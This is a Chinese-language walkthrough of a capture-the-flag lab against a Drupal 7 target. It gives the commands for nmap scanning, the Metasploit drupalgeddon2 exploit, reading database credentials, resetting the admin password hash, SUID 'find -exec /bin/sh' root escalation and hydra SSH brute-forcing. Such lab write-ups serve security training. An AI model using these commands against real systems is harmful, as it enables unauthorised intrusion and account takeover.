- kail虚拟机ip为
- nmap -sP 192.168.72.197/24 扫描本网段存活主机
- nmap -sV 192.168.72.198 查看靶机开放了哪些服务及服务版本
发现靶机开放ssh服务和http服务 - 尝试访问http服务
- 使用插件Wappalyzer进行网站指纹识别发现网站使用Drupal 7.x管理系统
- 用MSF search一下该CMS已知的漏洞
- 启动msf(mfsconsole)
- 漏洞利用
- 有很多可以使用的模块,选择一个最新的模块进行利用
- use exploit/unix/webapp/drupal_drupalgeddon2
- 设置目标IP地址 set RHOST 192.168.72.198
- 利用该模块进行攻击 exploit,可以成功获取目标靶机的 shell
- 成功拿到shell
- 拿到shell,用户权限为 www-data
- 利用python反弹shell
理解这段英语,提示需要提升权限为root权限 - 继续在站点路径下寻找敏感文件
这段英语提示寻找站点的配置文件,Drupal的默认配置文件为 /var/www/sites/default/settings.php - 在这里发现flag2和数据库账号和密码,flag2提示,提升权限为root来查看敏感文件,或者直接爆破
- 进入数据库,查看
- 找Drupal user 表,发现admin用户,并退出mysql
- 置换drupal密码,阅读此文章http://drupalchina.cn/node/2128
php scripts/password-hash.sh 123456
- 重新进入mysql,进入到drupaldb表中,置换密码
- 此时数据库中账号为admin,密码为123456,用次账号登录网址,进入网站,在网站中查找有用信息
- 在网站目录content里面找到flag3的提示
- flag3中有提示,使用find命令,并提示 -exec,是suid提权
find / -perm -4000 2>/dev/null
这行命令不懂可以先跳过,后面给出三篇文章,阅读之后可以看懂这行命令,初学看懂就行,不需要深究,太耗费精力。
find /
-perm -4000
2>/dev/null
- 在网站站点路径下,使用命令测试,发现为root权限
touch 666
find / -name 666 -exec "whoami" \;
find / -name 666 -exec "whoami" \;find / -name 666 -exec "/bin/sh" \;
- 到这个地方渗透是成功了,但是还有登陆终端的账号和密码,使用爆破的方法
查看 /etc/passwd 文件,发现存在 flag4 用户,可以使用hydra + John the Ripper的密码本,进行爆破进行。
- John the Ripper需要自己安装,参考这个文章安装john
hydra -l flag4 -P /root/桌面/john-1.8.0/run/password.lst ssh://192.168.72.198
密码为:orange
- 登陆终端